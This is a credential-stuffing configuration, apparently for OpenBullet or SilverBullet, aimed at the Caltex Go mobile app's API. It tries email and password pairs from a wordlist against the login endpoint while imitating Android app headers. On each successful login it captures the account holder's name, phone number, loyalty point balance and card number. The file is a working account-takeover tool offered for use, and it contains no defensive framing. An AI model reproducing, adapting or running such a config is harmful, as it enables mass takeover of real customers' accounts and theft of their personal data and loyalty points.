[SETTINGS]
{
  "Name": "CaltexGO",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2024-09-01T03:33:33.3333333-07:00",
  "AdditionalInfo": "github.com/0xSums",
  "RequiredPlugins": [],
  "Author": "✧",
  "Version": "[t.me/imSums]"
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "CaltexGO",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
#GenerateGUID FUNCTION GenerateGUID -> VAR "GUID" 

#*/api/omni-channel-verification REQUEST POST "https://ctxgo-prod-mobile-fd-cvx-jpe1-ene4gae3ezd4gjam.a02.azurefd.net/api/omni-channel-verification" 
  CONTENT "{\"email\":\"<USER>\"}" 
  CONTENTTYPE "application/json" 
  HEADER "Accept: application/json" 
  HEADER "X-Header-Device_id: <GUID>" 
  HEADER "X-Header-Platform: android" 
  HEADER "X-Header-Country: AU" 
  HEADER "X-Header-Language_code: EN" 
  HEADER "Authorization: " 
  HEADER "Mobilekey: " 
  HEADER "X-Header-Device_model: Android SDK" 
  HEADER "X-Header-Os_version: 29" 
  HEADER "X-Header-App_version: 6.1.0" 
  HEADER "X-Header-Event_source: Mobile Application" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "User-Agent: okhttp/3.12.12" 

#200_OK? KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Failure OR 
    KEY "<RESPONSECODE>" Contains "401" 

#*/api/login REQUEST POST "https://ctxgo-prod-mobile-fd-cvx-jpe1-ene4gae3ezd4gjam.a02.azurefd.net/api/login" 
  CONTENT "{\"email\":\"<USER>\",\"password\":\"<PASS>\"}" 
  CONTENTTYPE "application/json" 
  HEADER "Accept: application/json" 
  HEADER "X-Header-Device_id: <GUID>" 
  HEADER "X-Header-Platform: android" 
  HEADER "X-Header-Country: AU" 
  HEADER "X-Header-Language_code: EN" 
  HEADER "Authorization: " 
  HEADER "Mobilekey: " 
  HEADER "X-Header-Device_model: Android SDK" 
  HEADER "X-Header-Os_version: 29" 
  HEADER "X-Header-App_version: 6.1.0" 
  HEADER "X-Header-Event_source: Mobile Application" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "User-Agent: okhttp/3.12.12" 

#200_OK? KEYCHECK 
  KEYCHAIN Success OR 
    KEY "<RESPONSECODE>" EqualTo "200" 
    KEY "\"success\": true" 
  KEYCHAIN Failure OR 
    KEY "<RESPONSECODE>" EqualTo "400" 

#firstName PARSE "<SOURCE>" JSON "firstName" -> VAR "FN" 

#lastName PARSE "<SOURCE>" JSON "lastName" -> VAR "LN" 

#Name FUNCTION ToUppercase "<FN> <LN>" -> CAP "Name" 

#countryCode PARSE "<SOURCE>" JSON "countryCode" -> VAR "CC" "(" ")" 

#mobileNumber PARSE "<SOURCE>" JSON "mobileNumber" CreateEmpty=FALSE -> CAP "Phone" "<CC>" "" 

#x-header-token PARSE "<HEADERS(x-header-token)>" LR "" "" -> VAR "X" 

#*/protected/profile/get-details REQUEST GET "https://ctxgo-prod-mobile-fd-cvx-jpe1-ene4gae3ezd4gjam.a02.azurefd.net/api/protected/profile/get-details" 
  
  HEADER "Accept: application/json" 
  HEADER "X-Header-Device_id: <GUID>" 
  HEADER "X-Header-Platform: android" 
  HEADER "X-Header-Country: AU" 
  HEADER "X-Header-Language_code: EN" 
  HEADER "Authorization: <X>" 
  HEADER "Mobilekey: <X>" 
  HEADER "X-Header-Device_model: Android SDK" 
  HEADER "X-Header-Os_version: 29" 
  HEADER "X-Header-App_version: 6.1.0" 
  HEADER "X-Header-Event_source: Mobile Application" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "User-Agent: okhttp/3.12.12" 

#pointBalance PARSE "<SOURCE>" JSON "pointBalance" CreateEmpty=FALSE -> CAP "Points" 

#CardNumber PARSE "<SOURCE>" JSON "CardNumber" CreateEmpty=FALSE -> CAP "Card#" 

#Points? KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Custom "CUSTOM" OR 
    KEY "<Points>" EqualTo "0" 

